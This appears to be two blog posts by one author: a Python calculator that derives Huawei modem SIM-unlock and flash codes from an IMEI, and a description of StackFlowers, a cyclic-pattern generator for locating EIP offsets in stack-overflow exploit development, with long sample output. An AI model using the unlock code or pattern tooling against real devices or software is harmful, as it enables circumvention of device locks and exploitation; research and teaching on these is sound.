

Huawei modem unlock calculator


I have always used a USB modem (a Huawei E169) for my internet connection, because of the flexibility and reliability it gives me on a notebook. Two days ago I paid the bill late and my connection was cut off. Reading the bill, I noticed it was much higher than what other providers charge. I wanted to move to another provider, but could not: the modem was SIM-locked by the provider and only accepts that provider's SIM card. I had heard there were ways to unlock it, but they all involved paying a service. So I did some research into the unlock-code algorithm used by Huawei modems, found it, and implemented it in my own program; now I can use any SIM card in the modem. Here is the source: it contains the algorithm, and you can either run it directly or import it into your own program ;). Hope you enjoy it!

A note on what the code actually shows: the unlock and flash codes are nothing more than MD5(IMEI + a fixed constant), folded byte-wise and masked to 25 bits. The only "secret" is that constant, so anyone who knows a modem's IMEI (printed on the label) can compute its code — this is obscurity, not a cryptographic lock.

#!/usr/bin/python
# -*- coding: utf-8 -*-
#   This library is free software; you can redistribute it and/or
#   modify it under the terms of the GNU Lesser General Public
#   License as published by the Free Software Foundation; either
#   version 2.1 of the License, or (at your option) any later version.
#
#   This library is distributed in the hope that it will be useful,
#   but WITHOUT ANY WARRANTY; without even the implied warranty of
#   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
#   Lesser General Public License for more details.
#
#   You should have received a copy of the GNU Lesser General Public
#   License along with this library; if not, write to the
#      Free Software Foundation, Inc.,
#      59 Temple Place, Suite 330,
#      Boston, MA  02111-1307  USA
#
#   Copyright 2010 Gunslinger_ <yudha.gunslinger@gmail.com>
#   http://bit.ly/c0debreaker

import hashlib, string

# Module metadata; __version__ and __author__ are shown in the CLI banner
# of the __main__ block at the bottom of the file.
__author__	= "Gunslinger_ <yudha.gunslinger@gmail.com>"
__date__ 	= "Tue, 14 Jun 2011 23:22:42 +0700"
__version__ 	= "1.0"
__copyright__ 	= "Copyright (c) 2010 Gunslinger_"

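class huawei_modem_unlocker(object):
    """
    Derive the Huawei "unlock" and "flash" codes for a modem from its IMEI.

    The scheme, exactly as implemented below, is: MD5(IMEI + fixed salt),
    XOR the four 8-hex-digit quarters of the digest together byte by byte,
    then keep the low 25 bits of the resulting 32-bit value and force bit 25
    on.  The only "secret" is the pair of salt constants (_UNLOCK_SALT /
    _FLASH_SALT); anyone who knows the IMEI can reproduce the codes, so this
    is obscurity rather than a cryptographic protection.

    Instance variables:

    Imei
        IMEI of the modem the codes will be calculated for.  No validation
        is performed: the value is used verbatim (after ``str()``), so a
        typo or stray whitespace silently yields a different code.
        Default : '0'

    Verbose
        Display how the algorithm works, step by step, on stdout.
        Default : False

    Works unchanged on Python 2.6+ and Python 3 (print() is only ever called
    with a single argument, and the hash input is encoded explicitly).
    """
    # Fixed salts appended to the IMEI before hashing (unlock / flash code).
    _UNLOCK_SALT = '5e8dd316726b0335'
    _FLASH_SALT = '97b7bc6be525ab44'
    # Final result is masked to 25 bits and bit 25 is always set.
    _MASK = 33554431   # 0x1ffffff
    _FLAG = 33554432   # 0x2000000

    def __init__(self, imei='0', verbose=False):
        ''' Huawei modem unlocker class constructor '''
        self._imei = imei
        self._verbose = verbose
        # Explicit encode: hashlib.md5() rejects text on Python 3, and the
        # IMEI is expected to be plain ASCII digits anyway.
        self._md5u = hashlib.md5((str(imei) + self._UNLOCK_SALT).encode('ascii')).hexdigest()
        self._md5f = hashlib.md5((str(imei) + self._FLASH_SALT).encode('ascii')).hexdigest()
        # Filled in by calc(); ints after the first call.
        self._unlock_code = ''
        self._flash_code = ''
        # verbose formatting
        self._width = 21
        self._w = 10
        self._header_format = '%-*s%*s'
        self._format = '   %d  | %-*s | %*s  '

    def xor_digits(self, source, counter):
        ''' XOR one byte (two hex digits) taken from each 8-digit quarter of a hex digest.

        source  -- hex string, normally a 32-character MD5 hexdigest
        counter -- even offset (0, 2, 4 or 6) selecting the byte inside each quarter
        Returns the XOR of the four selected bytes as an int (0..255).
        '''
        value = 0
        for quarter_start in (0, 8, 16, 24):
            begin = quarter_start + counter
            # Leading '0' keeps an empty slice parsing as 0, as the original did.
            value ^= int('0' + source[begin:begin + 2], 16)
        return value

    def calc(self):
        ''' Run the algorithm and return (unlock_code, flash_code) as ints.

        The hex accumulators are local and rebuilt on every call, so calling
        calc()/run() more than once returns the same pair.  (Previously the
        second call appended new bytes to the already-converted int from the
        first call and silently produced a different number.)
        '''
        unlock_hex = ''
        flash_hex = ''
        if self._verbose:
            print("=" * (self._width + 13))
            print(" Iter." + "|" + " Unlock byte " + "|" + " Flash byte ")
            print("-" * (self._width + 13))
        # Four iterations, one byte (two hex digits) per quarter each time.
        for iteration, offset in enumerate(range(0, 8, 2), 1):
            # '%02x' yields the same zero-padded byte as zfill(hex(x)[2:], 2).
            unlock_hex += '%02x' % self.xor_digits(self._md5u, offset)
            flash_hex += '%02x' % self.xor_digits(self._md5f, offset)
            if self._verbose:
                print(self._format % (iteration, self._width - self._w, unlock_hex, self._w, flash_hex))
        unlock_raw = int('0' + unlock_hex, 16)
        flash_raw = int('0' + flash_hex, 16)
        # & binds tighter than |: (raw & MASK) | FLAG.
        unlock = unlock_raw & self._MASK | self._FLAG
        flash = flash_raw & self._MASK | self._FLAG
        if self._verbose:
            print("=" * (self._width + 13))
            # Show the masking step directly -- no eval() of a built string.
            print("\nUNLOCK CODE = %d & %d | %d = %d" % (unlock_raw, self._MASK, self._FLAG, unlock))
            print("FLASH CODE  = %d & %d | %d = %d\n" % (flash_raw, self._MASK, self._FLAG, flash))
        self._unlock_code = unlock
        self._flash_code = flash
        return (self._unlock_code, self._flash_code)

    def run(self):
        ''' Fire it up ! Convenience wrapper returning calc()'s (unlock, flash) pair. '''
        return self.calc()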

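if __name__ == '__main__':
    import sys
    print("\nHuawei modem unlock code calculator v.%s by %s \n" % (__version__, __author__))
    # raw_input() exists only on Python 2; input() is its Python 3 equivalent.
    try:
        _read_line = raw_input
    except NameError:
        _read_line = input
    inpimei = _read_line("Please input modem IMEI : ").strip()
    # The algorithm hashes whatever it is given, so a mistyped IMEI produces
    # a code without any error; warn (but continue) if it is not 15 digits.
    if not (inpimei.isdigit() and len(inpimei) == 15):
        sys.stderr.write("[!] Warning: '%s' does not look like a 15-digit IMEI; the result is probably unusable\n" % inpimei)
    cracker = huawei_modem_unlocker(inpimei)
    a, b = cracker.run()
    print("\n-> IMEI\t\t= %s" % (inpimei))
    print("-> UNLOCK CODE\t= %s" % (a))
    print("-> FLASH CODE\t= %s" % (b))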

StackFlowers | let’s flow it with the flowers


StackFlowers is a program that creates a cyclic pattern in a buffer, calculates the offset of a given substring within that pattern, and writes the pattern into a variable for a chosen programming language. It is used for stack-overflow exploit development: find exactly which bytes of the input land in a register such as EIP.

Preview :

I have also built a stand-alone Win32 executable, so it can be used directly on a Windows box for Win32 exploit development.

In this example we create a 5000-byte pattern, so that we can later find exactly which bytes of the input overwrite EIP.
The following command creates the 5000-byte pattern:

gunslinger@c0debreaker:/media/disk/stackflowers$ ./StackFlowers.py -c -s 5000

StackFlowers v.0.8 by Gunslinger_ <yudha.gunslinger@gmail.com>
		    ,
		.--'|}
	       /    /}}
	     .=\.--'`\}
	    //` '---./`
	    ||  /|
	     \\| |
	   |\_\\/
	   \__/\\
		\\
		 \| "Lets flow with the flowers"

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9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6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2F
d3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk

Output has been saved in StackFlowers.log

gunslinger@c0debreaker:/media/disk/stackflowers$

Alternatively we can have it write the pattern directly into a variable in a given programming language.
The following options create a 5000-byte pattern in a variable named “buff”, in Python syntax, split every 50 bytes:

StackFlowers v.0.8 by Gunslinger_ <yudha.gunslinger@gmail.com>
		    ,
		.--'|}
	       /    /}}
	     .=\.--'`\}
	    //` '---./`
	    ||  /|
	     \\| |
	   |\_\\/
	   \__/\\
		\\
		 \| "Lets flow with the flowers"

buff = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab"
buff += "6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A"
buff += "d3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9"
buff += "Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag"
buff += "6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2A"
buff += "i3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9"
buff += "Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al"
buff += "6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2A"
buff += "n3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9"
buff += "Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq"
buff += "6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2A"
buff += "s3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9"
buff += "Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av"
buff += "6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2A"
buff += "x3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9"
buff += "Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba"
buff += "6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2B"
buff += "c3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9"
buff += "Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf"
buff += "6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
buff += "h3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9"
buff += "Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk"
buff += "6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2B"
buff += "m3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9"
buff += "Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp"
buff += "6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2B"
buff += "r3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9"
buff += "Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu"
buff += "6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2B"
buff += "w3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9"
buff += "By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz"
buff += "6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2C"
buff += "b3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9"
buff += "Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce"
buff += "6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2C"
buff += "g3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9"
buff += "Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj"
buff += "6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2C"
buff += "l3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9"
buff += "Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"
buff += "6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2C"
buff += "q3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9"
buff += "Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct"
buff += "6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2C"
buff += "v3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9"
buff += "Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy"
buff += "6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2D"
buff += "a3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9"
buff += "Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd"
buff += "6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D"
buff += "f3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9"
buff += "Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di"
buff += "6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2D"
buff += "k3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9"
buff += "Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn"
buff += "6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2D"
buff += "p3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9"
buff += "Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds"
buff += "6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2D"
buff += "u3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9"
buff += "Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx"
buff += "6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2D"
buff += "z3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9"
buff += "Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec"
buff += "6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2E"
buff += "e3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9"
buff += "Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh"
buff += "6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2E"
buff += "j3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9"
buff += "El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em"
